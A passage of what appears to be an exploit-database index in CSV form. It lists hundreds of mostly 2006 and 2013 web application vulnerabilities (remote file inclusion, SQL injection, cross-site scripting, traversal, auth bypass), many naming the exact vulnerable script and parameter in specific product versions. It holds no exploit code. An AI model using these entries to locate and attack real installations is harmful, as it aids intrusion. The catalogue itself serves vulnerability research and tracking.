Vulnerabilities",2006-06-29,securityconnection,webapps,php, +28133,exploits/php/webapps/28133.txt,"newsPHP 2006 PRO - 'index.php' Multiple SQL Injections",2006-06-29,securityconnection,webapps,php, +28134,exploits/php/webapps/28134.txt,"newsPHP 2006 PRO - '/inc/rss_feed.php?category' SQL Injection",2006-06-29,securityconnection,webapps,php, +28136,exploits/php/webapps/28136.pl,"Vincent-Leclercq News 5.2 - 'Diver.php' SQL Injection",2006-06-23,DarkFig,webapps,php, +28137,exploits/php/webapps/28137.txt,"SoftBiz Banner Exchange Script 1.0 - 'insertmember.php?city' Cross-Site Scripting",2006-06-29,securityconnection,webapps,php, +28138,exploits/php/webapps/28138.txt,"SoftBiz Banner Exchange Script 1.0 - 'lostpassword.php?PHPSESSID' Cross-Site Scripting",2006-06-29,securityconnection,webapps,php, +28139,exploits/php/webapps/28139.txt,"SoftBiz Banner Exchange Script 1.0 - 'gen_confirm_mem.php?PHPSESSID' Cross-Site Scripting",2006-06-29,securityconnection,webapps,php, +28140,exploits/php/webapps/28140.txt,"SoftBiz Banner Exchange Script 1.0 - 'index.php?PHPSESSID' Cross-Site Scripting",2006-06-29,securityconnection,webapps,php, +28141,exploits/php/webapps/28141.txt,"SiteBuilder-FX - 'top.php' Remote File Inclusion",2006-06-01,MazaGi,webapps,php, +28142,exploits/php/webapps/28142.txt,"Diesel Joke Site - 'Category.php' SQL Injection",2006-07-01,black-code,webapps,php, +28143,exploits/php/webapps/28143.pl,"SturGeoN Upload - Arbitrary File Upload",2006-07-01,"Jihad BENABRA",webapps,php, +28146,exploits/php/webapps/28146.txt,"Vincent Leclercq News 5.2 - Cross-Site Scripting",2006-07-03,DarkFig,webapps,php, +28147,exploits/php/webapps/28147.txt,"Plume CMS 1.0.4 - 'index.php?_PX_config[manager_path]' Remote File Inclusion",2007-07-03,CrAsh_oVeR_rIdE,webapps,php, +28148,exploits/php/webapps/28148.txt,"Plume CMS 1.0.4 - 'rss.php?_PX_config[manager_path]' Remote File Inclusion",2007-07-03,CrAsh_oVeR_rIdE,webapps,php, +28149,exploits/php/webapps/28149.txt,"Plume CMS 1.0.4 - 'search.php?_PX_config[manager_path]' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,webapps,php, +28150,exploits/php/webapps/28150.txt,"free QBoard 1.1 - 'index.php?qb_path' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,webapps,php, +28151,exploits/php/webapps/28151.txt,"free QBoard 1.1 - 'about.php?qb_path' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,webapps,php, +28152,exploits/php/webapps/28152.txt,"free QBoard 1.1 - 'contact.php?qb_path' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,webapps,php, +28153,exploits/php/webapps/28153.txt,"free QBoard 1.1 - 'delete.php?qb_path' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,webapps,php, +28154,exploits/php/webapps/28154.txt,"free QBoard 1.1 - 'faq.php?qb_path' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,webapps,php, +28155,exploits/php/webapps/28155.txt,"free QBoard 1.1 - 'features.php?qb_path' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,webapps,php, +28156,exploits/php/webapps/28156.txt,"free QBoard 1.1 - 'history.php?qb_path' Remote File Inclusion",2006-07-03,CrAsh_oVeR_rIdE,webapps,php, +28157,exploits/php/webapps/28157.txt,"VirtuaStore 2.0 - 'Password' SQL Injection",2006-07-03,supermalhacao,webapps,php, +28158,exploits/php/webapps/28158.txt,"QTO File Manager 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-07-03,"EllipSiS Security",webapps,php, +28159,exploits/php/webapps/28159.txt,"Glossaire 1.7 - Remote File Inclusion",2006-07-03,"CrAzY CrAcKeR",webapps,php, +28161,exploits/php/webapps/28161.txt,"PHPWebGallery 1.x - 'comments.php' Cross-Site Scripting",2006-07-04,iss4m,webapps,php, +28162,exploits/php/webapps/28162.txt,"Randshop 0.9.3/1.2 - 'index.php' Remote File Inclusion",2006-07-04,black-code,webapps,php, +28163,exploits/php/webapps/28163.txt,"PostNuke 0.6x/0.7x - Multiple Cross-Site Scripting Vulnerabilities",2006-07-04,rgod,webapps,php, +28166,exploits/php/webapps/28166.pl,"LifeType 1.0.5 - 'index.php?Date' SQL Injection",2006-07-05,"Alejandro Ramos",webapps,php, +28167,exploits/php/webapps/28167.txt,"Invision Power Board 1.x/2.x - Multiple SQL Injections",2006-07-05,"CrAzY CrAcKeR",webapps,php, +28168,exploits/php/webapps/28168.txt,"Blog:CMS 4.1 - 'Thumb.php' Remote File Inclusion",2006-07-05,"EllipSiS Security",webapps,php, +28171,exploits/php/webapps/28171.txt,"Zyxware Health Monitoring System - Multiple Vulnerabilities",2013-09-09,"Sarahma Security",webapps,php, +28273,exploits/php/webapps/28273.txt,"PHPSavant Savant2 - 'Stylesheet.php?MosConfig_absolute_path' Remote File Inclusion",2006-07-25,botan,webapps,php, +28174,exploits/php/webapps/28174.txt,"Moodle 2.3.8/2.4.5 - Multiple Vulnerabilities",2013-09-09,"Ciaran McNally",webapps,php, +28175,exploits/linux/webapps/28175.txt,"Sophos Web Protection Appliance - Multiple Vulnerabilities",2013-09-09,"Core Security",webapps,linux, +28176,exploits/php/webapps/28176.txt,"ATutor 1.5.x - 'create_course.php' Multiple Cross-Site Scripting Vulnerabilities",2006-07-06,"Security News",webapps,php, +28177,exploits/php/webapps/28177.txt,"ATutor 1.5.x - '/documentation/admin/index.php' Cross-Site Scripting",2006-07-06,"Security News",webapps,php, +28178,exploits/php/webapps/28178.txt,"ATutor 1.5.x - 'password_reminder.php?forgot' Cross-Site Scripting",2006-07-06,"Security News",webapps,php, +28179,exploits/php/webapps/28179.txt,"ATutor 1.5.x - '/users/browse.php?cat' Cross-Site Scripting",2006-07-06,"Security News",webapps,php, +28180,exploits/php/webapps/28180.txt,"ATutor 1.5.x - '/admin/fix_content.php?submit' Cross-Site Scripting",2006-07-06,"Security News",webapps,php, +28184,exploits/hardware/webapps/28184.txt,"D-Link DIR-505 1.06 - Multiple Vulnerabilities",2013-09-10,"Alessandro Di Pinto",webapps,hardware, +28185,exploits/php/webapps/28185.txt,"glFusion 1.3.0 - 'search.php?cat_id' SQL Injection",2013-09-10,"Omar Kurt",webapps,php, +28190,exploits/php/webapps/28190.txt,"Extcalendar 2.0 - 'Extcalendar.php' Remote File Inclusion",2006-07-07,Matdhule,webapps,php, +28191,exploits/php/webapps/28191.txt,"AjaXplorer 1.0 - Multiple Vulnerabilities",2013-09-10,"Trustwave's SpiderLabs",webapps,php, +28192,exploits/php/webapps/28192.txt,"ATutor 1.5.3 - Multiple Input Validation Vulnerabilities",2006-07-08,securityconnection,webapps,php, +28193,exploits/asp/webapps/28193.txt,"Webvizyon - 'SayfalaAltList.asp' SQL Injection",2006-07-08,StorMBoY,webapps,asp, +28195,exploits/php/webapps/28195.txt,"RW::Download - 'stats.php' Remote File Inclusion",2006-07-08,StorMBoY,webapps,php, +28199,exploits/php/webapps/28199.txt,"Mambo Componen phpBB 1.2.4 - Multiple Remote File Inclusions",2006-07-09,h4ntu,webapps,php, +28200,exploits/php/webapps/28200.txt,"Farsinews 3.0 - 'Tiny_mce_gzip.php' Directory Traversal",2006-07-10,armin390,webapps,php, +28201,exploits/php/webapps/28201.txt,"Graffiti Forums 1.0 - 'Topics.php' SQL Injection",2006-07-10,Paisterist,webapps,php, +28203,exploits/asp/webapps/28203.txt,"Hosting Controller 1.x - 'error.asp' Cross-Site Scripting",2006-07-11,Dea7h,webapps,asp, +28204,exploits/php/webapps/28204.txt,"SaPHPLesson 2.0 - 'add.php' SQL Injection",2006-07-11,C.B.B.L,webapps,php, +28205,exploits/php/webapps/28205.txt,"FlexWATCH Network Camera - Cross-Site Scripting",2006-06-11,"Jaime Blasco",webapps,php, +28206,exploits/php/webapps/28206.txt,"Fantastic Guestbook 2.0.1 - 'Guestbook.php' HTML Injection",2006-07-11,omnipresent,webapps,php, +28208,exploits/asp/webapps/28208.txt,"FlexWATCH 3.0 - 'AIndex.asp' Authentication Bypass",2006-07-12,"Jaime Blasco",webapps,asp, +28211,exploits/php/webapps/28211.txt,"Lazarus Guestbook 1.6 - 'codes-english.php?show' Cross-Site Scripting",2006-07-12,simo64,webapps,php, +28212,exploits/php/webapps/28212.txt,"Lazarus Guestbook 1.6 - 'picture.php?img' Cross-Site Scripting",2006-07-12,simo64,webapps,php, +28214,exploits/php/webapps/28214.txt,"PhotoCycle 1.0 - 'PhotoCycle.php' Cross-Site Scripting",2006-07-13,Luny,webapps,php, +28215,exploits/php/webapps/28215.txt,"PHP Event Calendar 1.4 - 'calendar.php' Remote File Inclusion",2006-07-13,Solpot,webapps,php, +28216,exploits/php/webapps/28216.txt,"FlatNuke 2.5.7 - 'index.php' Remote File Inclusion",2006-07-13,rgod,webapps,php, +28217,exploits/php/webapps/28217.txt,"Forum 5 - 'pm.php' Local File Inclusion",2006-07-13,rgod,webapps,php, +28219,exploits/php/webapps/28219.txt,"Dream4 Koobi Pro 5.6 - 'showtopic' SQL Injection",2006-07-13,"Evampire chiristof",webapps,php, +28223,exploits/php/webapps/28223.txt,"Subberz Lite - UserFunc Remote File Inclusion",2006-07-14,"Chironex Fleckeri",webapps,php, +28229,exploits/php/webapps/28229.txt,"VisNetic Mail Server 8.3.5 - Multiple File Inclusions",2006-07-17,"Tan Chew Keong",webapps,php, +28231,exploits/php/webapps/28231.txt,"ListMessenger 0.9.3 - 'LM_Path' Remote File Inclusion",2006-07-17,xoron,webapps,php, +28233,exploits/php/webapps/28233.txt,"Mambo Module Calendar 1.5.7 - 'Com_Calendar.php' Remote File Inclusion",2006-07-17,Matdhule,webapps,php, +28236,exploits/ios/webapps/28236.txt,"Talkie Bluetooth Video iFiles 2.0 iOS - Multiple Vulnerabilities",2013-09-12,Vulnerability-Lab,webapps,ios, +28238,exploits/windows/webapps/28238.txt,"Microsoft SharePoint 2013 (Cloud) - Persistent Exception Handling (MS13-067)",2013-09-12,Vulnerability-Lab,webapps,windows, +28239,exploits/hardware/webapps/28239.txt,"D-Link DSL-2740B - Multiple Cross-Site Request Forgery Vulnerabilities",2013-09-12,"Ivano Binetti",webapps,hardware, +28243,exploits/linux/webapps/28243.txt,"Synology DiskStation Manager (DSM) 4.3-3776 - Multiple Vulnerabilities",2013-09-12,"Andrea Fabrizi",webapps,linux, +28247,exploits/php/webapps/28247.txt,"IDevSpot PHPLinkExchange 1.0 - 'index.php' Remote File Inclusion",2006-07-20,r0t,webapps,php, +28248,exploits/php/webapps/28248.txt,"IDevSpot PHPHostBot 1.0 - 'index.php' Remote File Inclusion",2006-07-20,r0t,webapps,php, +28249,exploits/php/webapps/28249.txt,"GeoAuctions 1.0.6 Enterprise - 'index.php?d' SQL Injection",2006-07-20,LBDT,webapps,php, +28250,exploits/php/webapps/28250.txt,"Geodesic Solutions (Multiple Products) - 'index.php?b' SQL Injection",2006-07-20,LBDT,webapps,php, +28251,exploits/php/webapps/28251.txt,"MiniBB 1.5 - 'news.php' Remote File Inclusion",2006-07-20,AG-Spider,webapps,php, +28253,exploits/php/webapps/28253.txt,"Advanced Poll 2.0.2 - 'common.inc.php' Remote File Inclusion",2006-07-21,Solpot,webapps,php, +28255,exploits/php/webapps/28255.txt,"Chameleon LE 1.203 - 'index.php' Directory Traversal",2006-07-21,kicktd,webapps,php, +28260,exploits/php/webapps/28260.txt,"Lussumo Vanilla 1.0 - RootDirectory Remote File Inclusion",2006-07-24,MFox,webapps,php, +28261,exploits/php/webapps/28261.txt,"RadScripts - 'a_editpage.php?Filename' Arbitrary File Overwrite",2006-07-24,INVENT,webapps,php, +28262,exploits/php/webapps/28262.txt,"MusicBox 2.3.4 - 'page' SQL Injection",2006-07-24,"EllipSiS Security",webapps,php, +28264,exploits/php/webapps/28264.txt,"Prince Clan Chess Club 0.8 - 'Include.PCchess.php' Remote File Inclusion",2006-07-24,OLiBekaS,webapps,php, +28267,exploits/php/webapps/28267.txt,"LinksCaffe 3.0 - 'links.php' Multiple SQL Injections",2006-07-25,simo64,webapps,php, +28268,exploits/php/webapps/28268.txt,"LinksCaffe 3.0 - 'counter.php?tablewidth' Cross-Site Scripting",2006-07-25,simo64,webapps,php, +28269,exploits/php/webapps/28269.txt,"LinksCaffe 3.0 - 'links.php?newdays' Cross-Site Scripting",2006-07-25,simo64,webapps,php, +28270,exploits/php/webapps/28270.txt,"LinksCaffe 3.0 - 'menu.inc.php' Multiple Cross-Site Scripting Vulnerabilities",2006-07-25,simo64,webapps,php, +28272,exploits/php/webapps/28272.txt,"Zimplit CMS 3.0 - Multiple Vulnerabilities",2013-09-13,"Yashar shahinzadeh",webapps,php, +28274,exploits/php/webapps/28274.txt,"PHP Pro Bid 5.2.4 - 'auctionsearch.php?advsrc' Cross-Site Scripting",2006-07-25,"EllipSiS Security",webapps,php, +28275,exploits/php/webapps/28275.txt,"PHP Pro Bid 5.2.4 - 'viewfeedback.php' Multiple SQL Injections",2006-07-25,"EllipSiS Security",webapps,php, +28276,exploits/php/webapps/28276.txt,"PHP Pro Bid 5.2.4 - 'categories.php?orderType' SQL Injection",2006-07-25,"EllipSiS Security",webapps,php, +28278,exploits/jsp/webapps/28278.txt,"OpenCMS 6.0/6.2 - Multiple Unauthorized Access Vulnerabilities",2006-07-26,"Meder Kydyraliev",webapps,jsp, +28279,exploits/hardware/webapps/28279.txt,"Router ONO Hitron CDE-30364 - Cross-Site Request Forgery",2013-09-14,"Matias Mingorance Svensson",webapps,hardware, +28280,exploits/php/webapps/28280.txt,"wwwThreads - 'calendar.php' Cross-Site Scripting",2006-07-26,l2odon,webapps,php, +28281,exploits/php/webapps/28281.txt,"phpBB-Auction 1.x - 'auction_room.php?ar' SQL Injection",2006-07-26,l2odon,webapps,php, +28282,exploits/php/webapps/28282.txt,"phpBB-Auction 1.x - 'auction_store.php?u' SQL Injection",2006-07-26,l2odon,webapps,php, +28283,exploits/hardware/webapps/28283.txt,"ZYXEL Prestige 660H-61 ADSL Router - Cross-Site Scripting",2006-07-27,jose.palanco,webapps,hardware, +28289,exploits/php/webapps/28289.txt,"Bosdates 3.x/4.0 - 'Payment.php' Remote File Inclusion",2006-07-27,admin@jaascois.com,webapps,php, +28291,exploits/php/webapps/28291.txt,"MyBulletinBoard (MyBB) 1.x - 'usercp.php' Directory Traversal",2006-07-27,"Roozbeh Afrasiabi",webapps,php, +28292,exploits/php/webapps/28292.txt,"GeoClassifieds Enterprise 2.0.5.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-07-27,"EllipSiS Security",webapps,php, +28294,exploits/php/webapps/28294.txt,"PHP-Nuke - 'INP modules.php' Cross-Site Scripting",2006-07-28,l2odon,webapps,php, +28295,exploits/php/webapps/28295.txt,"Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - 'wp-comments-post.php' Remote File Inclusion",2006-07-28,Drago84,webapps,php, +28296,exploits/php/webapps/28296.txt,"Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - 'wp-feed.php' Remote File Inclusion",2006-07-28,Drago84,webapps,php, +28297,exploits/php/webapps/28297.txt,"Joomla! Plugin JD-WordPress 2.0-1.0 RC2 - 'wp-trackback.php' Remote File Inclusion",2006-07-28,Drago84,webapps,php, +28302,exploits/php/webapps/28302.txt,"Joomla! Component Liga Manager Online 2.0 - Remote File Inclusion",2006-07-30,vitux.manis,webapps,php, +28303,exploits/php/webapps/28303.txt,"X-Scripts X-Protection 1.10 - 'Protect.php' SQL Injection",2006-07-29,SirDarckCat,webapps,php, +28304,exploits/php/webapps/28304.txt,"X-Scripts X-Poll 1.10 - 'top.php' SQL Injection",2006-07-29,SirDarckCat,webapps,php, +28305,exploits/php/webapps/28305.txt,"Ajax Chat 0.1 - 'operator_chattranscript.php?chatid' Traversal Arbitrary File Access",2006-07-31,SirDarckCat,webapps,php, +28306,exploits/php/webapps/28306.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'signup.php?site_name' SQL Injection",2006-07-31,SirDarckCat,webapps,php, +28307,exploits/php/webapps/28307.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'admin.php' Multiple SQL Injections",2006-07-31,SirDarckCat,webapps,php, +28308,exploits/php/webapps/28308.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'members.php?cfg_root' Remote File Inclusion",2006-07-31,SirDarckCat,webapps,php, +28309,exploits/php/webapps/28309.txt,"Seir Anphin V666 Community Management System - Multiple SQL Injections",2006-07-31,CR,webapps,php, +28310,exploits/php/webapps/28310.txt,"Moskool 1.5 Component - 'Admin.Moskool.php' Remote File Inclusion",2006-07-31,saudi.unix,webapps,php, +28311,exploits/php/webapps/28311.txt,"myEvent 1.2/1.3 - 'myevent.php' Remote File Inclusion",2006-07-31,CeNGiZ-HaN,webapps,php, +28315,exploits/php/webapps/28315.txt,"Help Center Live 2.1.2 - 'module.php' Directory Traversal",2006-07-31,Dr.GooGle,webapps,php, +28316,exploits/php/webapps/28316.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities (2)",2006-07-31,SirDarckCat,webapps,php, +28317,exploits/php/webapps/28317.txt,"WoW Roster 1.5 - 'hsList.php?subdir' Remote File Inclusion",2006-08-01,skulmatic,webapps,php, +28318,exploits/php/webapps/28318.txt,"Knusperleicht Quickie - 'Quick_Path' Remote File Inclusion",2006-08-01,"Kurdish Security",webapps,php, +28319,exploits/php/webapps/28319.txt,"Knusperleicht FAQ 1.0 Script - 'index.php' Remote File Inclusion",2006-08-01,"Kurdish Security",webapps,php, +28320,exploits/php/webapps/28320.txt,"Knusperleicht Guestbook 3.5 - 'GB_PATH' Remote File Inclusion",2006-08-01,"Kurdish Security",webapps,php, +28321,exploits/cgi/webapps/28321.pl,"Barracuda Spam Firewall 3.3.x - 'preview_email.cgi?file' Arbitrary File Access",2006-08-01,"Greg Sinclair",webapps,cgi, +28322,exploits/php/webapps/28322.txt,"TinyPHPForum 3.6 - 'error.php' Information Disclosure",2006-08-01,SirDarckCat,webapps,php, +28323,exploits/php/webapps/28323.txt,"TinyPHPForum 3.6 - 'UpdatePF.php' Authentication Bypass",2006-08-01,SirDarckCat,webapps,php, +28324,exploits/php/webapps/28324.txt,"BlackBoard Products 6 - Multiple HTML Injection Vulnerabilities",2006-08-24,proton,webapps,php, +28326,exploits/php/webapps/28326.txt,"VWar 1.x - 'war.php?page' Cross-Site Scripting",2006-08-03,mfoxhacker,webapps,php, +28327,exploits/php/webapps/28327.txt,"VWar 1.x - 'war.php' Multiple SQL Injections",2006-08-03,mfoxhacker,webapps,php, +28329,exploits/php/webapps/28329.txt,"OpenEMR 4.1.1 Patch 14 - Multiple Vulnerabilities",2013-09-17,xistence,webapps,php, +28330,exploits/php/webapps/28330.txt,"Western Digital Arkeia Appliance 10.0.10 - Multiple Vulnerabilities",2013-09-17,xistence,webapps,php, +28339,exploits/asp/webapps/28339.txt,"Anychart 3.0 - 'Password' SQL Injection",2006-08-03,sCORPINo,webapps,asp, +28340,exploits/multiple/webapps/28340.c,"PSWD.JS - Insecure Password Hash",2006-08-03,"Gianstefano Monni",webapps,multiple, +28342,exploits/php/webapps/28342.txt,"vBulletin 3.0.14 - 'global.php' Encoded Cross-Site Scripting",2006-08-05,imei,webapps,php, +28509,exploits/php/webapps/28509.txt,"XHP CMS 0.5.1 - 'index.php' Cross-Site Scripting",2006-09-11,"HACKERS PAL",webapps,php, +28347,exploits/php/webapps/28347.txt,"XennoBB 2.1 - 'profile.php' Multiple SQL Injections",2006-08-07,"Chris Boulton",webapps,php, +28349,exploits/php/webapps/28349.txt,"TurnkeyWebTools PHP Simple Shop 2.0 - Multiple Remote File Inclusions",2006-08-07,Matdhule,webapps,php, +28350,exploits/php/webapps/28350.txt,"VWar 1.5 - 'war.php?vwar_root' Remote File Inclusion",2006-08-07,AG-Spider,webapps,php, +28351,exploits/php/webapps/28351.txt,"VWar 1.5 - 'member.php?vwar_root' Remote File Inclusion",2006-08-07,AG-Spider,webapps,php, +28352,exploits/php/webapps/28352.txt,"VWar 1.5 - 'calendar.php?vwar_root' Remote File Inclusion",2006-08-07,AG-Spider,webapps,php, +28353,exploits/php/webapps/28353.txt,"VWar 1.5 - 'challenge.php?vwar_root' Remote File Inclusion",2006-08-07,AG-Spider,webapps,php, +28354,exploits/php/webapps/28354.txt,"VWar 1.5 - 'joinus.php?vwar_root' Remote File Inclusion",2006-08-07,AG-Spider,webapps,php, +28355,exploits/php/webapps/28355.txt,"VWar 1.5 - 'news.php?vwar_root' Remote File Inclusion",2006-08-07,AG-Spider,webapps,php, +28356,exploits/php/webapps/28356.txt,"VWar 1.5 - 'stats.php?vwar_root' Remote File Inclusion",2006-08-07,AG-Spider,webapps,php, +28359,exploits/php/webapps/28359.txt,"phpPrintAnalyzer 1.1 - 'index.php' Remote File Inclusion",2006-08-07,sh3ll,webapps,php, +28362,exploits/php/webapps/28362.txt,"Simple One File Guestbook 1.0 - Security Bypass",2006-08-09,omnipresent,webapps,php, +28363,exploits/php/webapps/28363.txt,"CLUB Nuke 2.0 - Multiple SQL Injections",2006-08-09,ASIANEAGLE,webapps,php, +28364,exploits/php/webapps/28364.txt,"XennoBB 1.0.5/1.0.6/2.1/2.2 - 'profile.php' Directory Traversal",2006-08-09,"Chris Boulton",webapps,php, +28366,exploits/php/webapps/28366.txt,"MyBloggie 2.1.x - 'MyBloggie_Root_Path' Remote File Inclusion",2006-06-02,sh3ll,webapps,php, +28370,exploits/php/webapps/28370.txt,"Mafia Moblog 6 - 'Big.php' Remote File Inclusion",2006-08-10,sh3ll,webapps,php, +28371,exploits/php/webapps/28371.txt,"YaBBSE 1.x - 'index.php' Cross-Site Scripting",2006-08-10,O.U.T.L.A.W,webapps,php, +28372,exploits/php/webapps/28372.txt,"Tiny Web Gallery 1.5 - 'Image' Multiple Remote File Inclusions",2006-08-10,x0r0n,webapps,php, +28377,exploits/php/webapps/28377.txt,"WordPress Plugin Complete Gallery Manager 3.3.3 - Arbitrary File Upload",2013-09-18,Vulnerability-Lab,webapps,php, +28378,exploits/php/webapps/28378.txt,"miniBloggie 1.0 - 'Fname' Remote File Inclusion",2006-08-10,sh3ll,webapps,php, +28379,exploits/php/webapps/28379.txt,"WEBinsta Mailing List Manager 1.3 - 'Install3.php' Remote File Inclusion",2006-08-10,"Philipp Niedziela",webapps,php, +28382,exploits/php/webapps/28382.txt,"WordPress Plugin WP-DB Backup 1.6/1.7 - 'edit.php' Directory Traversal",2006-08-14,"marc & shb",webapps,php, +28385,exploits/asp/webapps/28385.txt,"BlaBla 4U - Multiple Cross-Site Scripting Vulnerabilities",2006-08-14,Vampire,webapps,asp, +28388,exploits/php/webapps/28388.txt,"PHP-Nuke 2.0 AutoHTML Module - Local File Inclusion",2006-08-15,MosT3mR,webapps,php, +28390,exploits/php/webapps/28390.txt,"Lizge 20 - 'index.php' Multiple Remote File Inclusions",2006-08-15,Crackers_Child,webapps,php, +28392,exploits/php/webapps/28392.txt,"Zen Cart Web Shopping Cart 1.x - 'autoload_func.php?autoLoadConfig[999][0][loadFile]' Remote File Inclusion",2006-08-15,"James Bercegay",webapps,php, +28393,exploits/asp/webapps/28393.txt,"AspxCommerce 2.0 - Arbitrary File Upload",2013-09-19,SANTHO,webapps,asp, +28396,exploits/php/webapps/28396.txt,"Mambo Component Reporter 1.0 - 'Reporter.sql.php' Remote File Inclusion",2006-08-16,Crackers_Child,webapps,php, +28399,exploits/php/webapps/28399.txt,"CubeCart 3.0.x - Multiple Input Validation Vulnerabilities",2006-08-17,rgod,webapps,php, +40378,exploits/linux/webapps/40378.txt,"Open-Xchange App Suite 7.8.2 - Cross-Site Scripting",2016-09-13,"Jakub A>>oczek",webapps,linux, +28402,exploits/php/webapps/28402.txt,"Blog:CMS 4.1 - 'Dir_Plugins' Multiple Remote File Inclusions",2006-08-17,Drago84,webapps,php, +28403,exploits/php/webapps/28403.txt,"Mambo Component LMTG Myhomepage 1.2 - Multiple Remote File Inclusions",2006-08-18,O.U.T.L.A.W,webapps,php, +28404,exploits/php/webapps/28404.txt,"Mambo Component Rssxt 1.0 - 'MosConfig_absolute_path' Multiple Remote File Inclusions",2006-08-18,Crackers_Child,webapps,php, +28406,exploits/php/webapps/28406.txt,"XennoBB 1.0.x/2.2 - Icon_Topic SQL Injection",2006-08-19,"Chris Boulton",webapps,php, +28409,exploits/php/webapps/28409.txt,"vTiger CRM 5.4.0 - 'index.php?onlyforuser' SQL Injection",2013-09-20,"High-Tech Bridge SA",webapps,php, +28410,exploits/php/webapps/28410.txt,"Mambo Component Display MOSBot Manager - 'MosConfig_absolute_path' Remote File Inclusion",2006-08-21,O.U.T.L.A.W,webapps,php, +28411,exploits/php/webapps/28411.txt,"DieselScripts Job Site - 'Forgot.php' Multiple Cross-Site Scripting Vulnerabilities",2006-08-21,night_warrior771,webapps,php, +28412,exploits/php/webapps/28412.txt,"DieselScripts DieselPay - 'index.php' Cross-Site Scripting",2006-08-21,night_warrior771,webapps,php, +28413,exploits/php/webapps/28413.txt,"cPanel 10.x - 'dohtaccess.html?dir' Cross-Site Scripting",2006-08-21,preth00nker,webapps,php, +28414,exploits/php/webapps/28414.txt,"cPanel 10.x - 'editit.html?File' Cross-Site Scripting",2006-08-21,preth00nker,webapps,php, +28415,exploits/php/webapps/28415.txt,"cPanel 10.x - 'showfile.html?File' Cross-Site Scripting",2006-08-21,preth00nker,webapps,php, +28416,exploits/php/webapps/28416.txt,"Mambo Component EstateAgent 1.0.2 - MosConfig_absolute_path Remote File Inclusion",2006-08-21,O.U.T.L.A.W,webapps,php, +28417,exploits/php/webapps/28417.txt,"ToendaCMS 0.x/1.0.x - 'TCMS_Administer' Remote File Inclusion",2006-08-21,You_You,webapps,php, +28418,exploits/php/webapps/28418.txt,"PHProjekt Content Management Module 0.6.1 - Multiple Remote File Inclusions",2006-08-21,"the master",webapps,php, +28419,exploits/php/webapps/28419.txt,"DieselScripts Smart Traffic - 'index.php' Remote File Inclusion",2006-08-21,night_warrior771,webapps,php, +28422,exploits/php/webapps/28422.txt,"DieselScripts Diesel Paid Mail - 'Getad.php' Cross-Site Scripting",2006-08-21,night_warrior771,webapps,php, +28423,exploits/php/webapps/28423.txt,"RedBlog 0.5 - 'index.php' Remote File Inclusion",2006-08-22,Root3r_H3ll,webapps,php, +28426,exploits/php/webapps/28426.txt,"Headline Portal Engine 0.x/1.0 - 'HPEInc' Multiple Remote File Inclusions",2006-08-21,"the master",webapps,php, +28428,exploits/php/webapps/28428.txt,"YaPiG 0.9x - 'Thanks_comment.php' Cross-Site Scripting",2006-10-13,Kuon,webapps,php, +28429,exploits/php/webapps/28429.js,"MyBB 1.1.7 - Multiple HTML Injection Vulnerabilities",2006-08-26,Redworm,webapps,php, +28430,exploits/php/webapps/28430.txt,"Jupiter CMS 1.1.5 - 'index.php' Remote File Inclusion",2006-08-26,D3nGeR,webapps,php, +28431,exploits/php/webapps/28431.txt,"Jetbox CMS 2.1 - 'Search_function.php' Remote File Inclusion",2006-08-26,D3nGeR,webapps,php, +28432,exploits/php/webapps/28432.txt,"BigACE 1.8.2 - 'item_main.php' Remote File Inclusion",2006-08-26,Vampire,webapps,php, +28433,exploits/php/webapps/28433.txt,"BigACE 1.8.2 - 'upload_form.php' Remote File Inclusion",2006-08-26,Vampire,webapps,php, +28434,exploits/php/webapps/28434.txt,"BigACE 1.8.2 - 'download.cmd.php' Remote File Inclusion",2006-08-26,Vampire,webapps,php, +28435,exploits/php/webapps/28435.txt,"BigACE 1.8.2 - 'admin.cmd.php' Remote File Inclusion",2006-08-26,Vampire,webapps,php, +28436,exploits/php/webapps/28436.txt,"Alstrasoft Video Share Enterprise 4.x - 'MyajaxPHP.php' Remote File Inclusion",2006-08-26,night_warrior771,webapps,php, +28437,exploits/php/webapps/28437.txt,"Joomla! / Mambo Component Comprofiler 1.0 - 'class.php' Remote File Inclusion",2006-08-26,Matdhule,webapps,php, +28439,exploits/php/webapps/28439.txt,"HLstats 1.34 - 'hlstats.php' Cross-Site Scripting",2006-08-29,kefka,webapps,php, +28440,exploits/php/webapps/28440.txt,"ModuleBased CMS - Multiple Remote File Inclusions",2006-08-29,sCORPINo,webapps,php, +28441,exploits/php/webapps/28441.txt,"IwebNegar 1.1 - 'comments.php' SQL Injection",2006-08-30,Hessam-x,webapps,php, +28442,exploits/php/webapps/28442.txt,"LinksCaffe 2.0/3.0 - Authentication Bypass",2006-07-25,HoangYenXinhDep,webapps,php, +28443,exploits/asp/webapps/28443.html,"Digiappz Freekot 1.01 - ASP SQL Injection",2006-08-30,FarhadKey,webapps,asp, +28444,exploits/php/webapps/28444.txt,"Alstrasoft Template Seller - 'Config[Template_Path]' Multiple Remote File Inclusions",2006-08-30,night_warrior771,webapps,php, +28446,exploits/php/webapps/28446.txt,"HLstats 1.34 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-08-30,MC.Iglo,webapps,php, +28447,exploits/php/webapps/28447.php,"osCommerce 2.1/2.2 - 'product_info.php' SQL Injection",2006-08-30,"James Bercegay",webapps,php, +28749,exploits/php/webapps/28749.txt,"osCommerce 2.2 - '/admin/newsletters.php?page' Cross-Site Scripting",2006-10-04,Lostmon,webapps,php, +28750,exploits/php/webapps/28750.txt,"osCommerce 2.2 - '/admin/orders_status.php?page' Cross-Site Scripting",2006-10-04,Lostmon,webapps,php, +28751,exploits/php/webapps/28751.txt,"osCommerce 2.2 - '/admin/products_attributes.php?page' Cross-Site Scripting",2006-10-04,Lostmon,webapps,php, +28464,exploits/php/webapps/28464.txt,"VisualShapers EZContents 2.0.3 - 'Headeruserdata.php' SQL Injection",2006-08-30,DarkFig,webapps,php, 